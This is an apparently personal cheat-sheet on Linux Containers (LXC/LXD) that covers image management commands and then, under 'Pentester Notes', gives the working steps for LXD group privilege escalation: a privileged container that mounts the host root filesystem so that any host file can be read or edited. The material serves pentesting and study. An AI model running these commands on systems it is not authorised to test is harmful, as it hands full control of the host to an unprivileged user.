Linux Containers (LXC)
Linux Containers (LXC) is a Linux-only virtualization method to run multiple Linux systems using the host Linux kernel.
Docker was first built over LXC. It provides additional features and a simplified interface. They share the notion of 'image' and 'container'.
LXC can only be used on Linux hosts. Users part of the lxd
group can call any commands without sudo.
$ lxd init
$ lxc image list # list downloaded images
If you have internet access, you can download an image:
$ lxc launch ubuntu:22.04 container_name
Alternatively, you can import an image from a file. You can build an alpine image (~3Mb) using lxd-alpine-builder (0.2k β, 2021 πͺ¦).
$ git clone https://github.com/saghul/lxd-alpine-builder
$ cd lxd-alpine-builder
$ sudo bash build-alpine
Transfer the generated tar.gz onto the target and use:
$ lxc image import xxx.tar.gz --alias image_name
Pentester Notes β οΈ
LXD Group Privilege Escalation
A member of the LXD group can be leveraged for privilege escalation. You will mount the folder /
within the container inside /mnt/hostfs/
allowing you to access any file or edit any file.
-
image_name
is the name of the image you want to use -
container_name
is a random name, such aspwned
-
device_name
doesn't matter, you can usepwned
too
host$ lxc init image_name container_name -c security.privileged=true
host$ lxc config device add container_name device_name disk source=/ path=/mnt/hostfs recursive=true
host$ lxc start container_name
host$ lxc exec container_name /bin/sh
container$ cd /mnt/hostfs/
π» To-do π»
Stuff that I found, but never read/used yet.
$ sudo apt-get install lxc lxc-utils -y
$ sudo lxc-create -n xxx -t yyy
$ lxc-ls
$ lxc-start/stop/restart -n xxx
$ lxc-config -n xxx -s storage/network/security
$ lxc-attach -n xxx [-f /path/to/share]